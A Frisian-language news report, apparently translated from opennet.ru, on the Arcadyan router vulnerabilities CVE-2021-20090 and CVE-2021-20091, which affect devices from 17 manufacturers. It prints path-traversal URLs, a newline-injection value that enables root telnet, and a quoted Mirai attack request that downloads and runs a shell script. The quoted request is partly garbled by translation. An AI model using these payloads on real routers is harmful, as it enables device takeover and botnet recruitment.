Kwetsberens yn thúsrouters dy't 17 fabrikanten beynfloedzje

In massale oanfal is opnommen op it netwurk tsjin thúsrouters wêrfan de firmware in HTTP-tsjinner ymplemintaasje brûkt fan it Arcadyan-bedriuw. Om kontrôle oer apparaten te krijen, wurdt in kombinaasje fan twa kwetsberens brûkt dy't it útfieren fan willekeurige koade mei rootrjochten op ôfstân kin útfiere. It probleem hat ynfloed op in frij breed oanbod fan ADSL-routers fan Arcadyan, ASUS en Buffalo, lykas apparaten levere ûnder de Beeline-merken (it probleem wurdt befêstige yn Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone en oare telecom operators. It wurdt opmurken dat it probleem is oanwêzich yn Arcadyan firmware foar mear as 10 jier en yn dizze tiid hat slagge te migrearjen nei op syn minst 20 apparaat modellen fan 17 ferskillende fabrikanten.

De earste kwetsberens, CVE-2021-20090, makket it mooglik om tagong te krijen ta elk webynterfaceskript sûnder autentikaasje. De essinsje fan 'e kwetsberens is dat yn' e webynterface guon mappen wêrmei't ôfbyldings, CSS-bestannen en JavaScript-skripts ferstjoerd wurde tagonklik sûnder autentikaasje. Yn dit gefal wurde mappen wêrfoar tagong sûnder autentikaasje tastien is kontrolearre mei it earste masker. It opjaan fan "../"-tekens yn paden om nei de âldermap te gean wurdt blokkearre troch de firmware, mar it brûken fan de kombinaasje "..%2f" wurdt oerslein. Sa is it mooglik om beskerme siden te iepenjen by it ferstjoeren fan fersiken lykas "http://192.168.1.1/images/..%2findex.htm".

De twadde kwetsberens, CVE-2021-20091, lit in autentike brûker feroaringen meitsje oan 'e systeemynstellingen fan it apparaat troch spesjaal opmakke parameters te ferstjoeren nei it application_abstract.cgi-skript, dat net kontrolearret foar de oanwêzigens fan in nije line-karakter yn 'e parameters . Bygelyks, by it útfieren fan in ping-operaasje, kin in oanfaller de wearde "192.168.1.2%0AARC_SYS_TelnetdEnable=1" opjaan yn it fjild mei it kontrolearre IP-adres, en it skript, by it meitsjen fan it ynstellingsbestân /tmp/etc/config/ .glbcfg, sil de rigel "AARC_SYS_TelnetdEnable=1" deryn skriuwe ", dy't de telnetd-tsjinner aktivearret, dy't ûnbeheinde kommando-shell tagong jout mei rootrjochten. Lykas, troch it ynstellen fan de parameter AARC_SYS, kinne jo elke koade op it systeem útfiere. De earste kwetsberens makket it mooglik om in problematysk skript sûnder autentikaasje út te fieren troch it tagong te krijen as "/images/..%2fapply_abstract.cgi".

Om kwetsberens te eksploitearjen, moat in oanfaller in fersyk stjoere kinne nei de netwurkpoarte wêrop de webynterface rint. Beoardielje troch de dynamyk fan 'e fersprieding fan' e oanfal, litte in protte operators tagong op har apparaten fan it eksterne netwurk om de diagnoaze fan problemen troch de stipetsjinst te ferienfâldigjen. As tagong ta de ynterface allinich beheind is ta it ynterne netwurk, kin in oanfal útfierd wurde fan in ekstern netwurk mei de technyk "DNS rebinding". Kwetsberheden wurde al aktyf brûkt om routers te ferbinen mei it Mirai-botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Ferbining: slute User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Boarne: opennet.ru

Add a comment